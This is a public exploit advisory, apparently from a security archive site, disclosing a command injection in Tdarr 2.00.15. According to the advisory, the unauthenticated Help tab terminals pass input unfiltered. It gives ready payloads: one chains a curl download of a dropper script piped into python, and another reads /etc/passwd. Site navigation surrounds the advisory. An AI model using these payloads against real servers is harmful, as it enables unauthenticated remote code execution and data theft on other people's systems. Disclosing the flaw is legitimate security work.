Tdarr 2.00.15 Command Injection

Tdarr 2.00.15 Command Injection: Posted Mar 11, 2022; Authored by Sam Smith; Tdarr version 2.00.15 suffers from a command injection vulnerability.; tags | exploit; SHA-256 | b601d9698e0c203090cb7edb4fa2426b862f26bbb2b5b2d2432ab593f2df42f2; Download | Favorite | View

Tdarr 2.00.15 Command Injection

# Exploit Title: Tdarr 2.00.15 - Command Injection
# Date: 10/03/2022
# Exploit Author: Sam Smith
# Vendor Homepage: https://tdarr.io
# Software Link: https://f000.backblazeb2.com/file/tdarrs/versions/2.00.15/linux_arm64/Tdarr_Server.zip
# Version: 2.00.15 (likely also older versions)
# Tested on: 2.00.15

Exploit:

The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell.

eg. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`.

Tdarr is not protected by any auth by default and no credentials are required to trigger RCE

Top Authors In Last 30 Days

Red Hat 194 files
Ubuntu 67 files
Debian 24 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
malvuln 4 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,011)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,194)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,473)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,437)
UNIX (9,390)
UnixWare (187)
Windows (6,649)
Other

Tdarr 2.00.15 Command Injection

Tdarr 2.00.15 Command Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Tdarr 2.00.15 Command Injection

Share This

Tdarr 2.00.15 Command Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems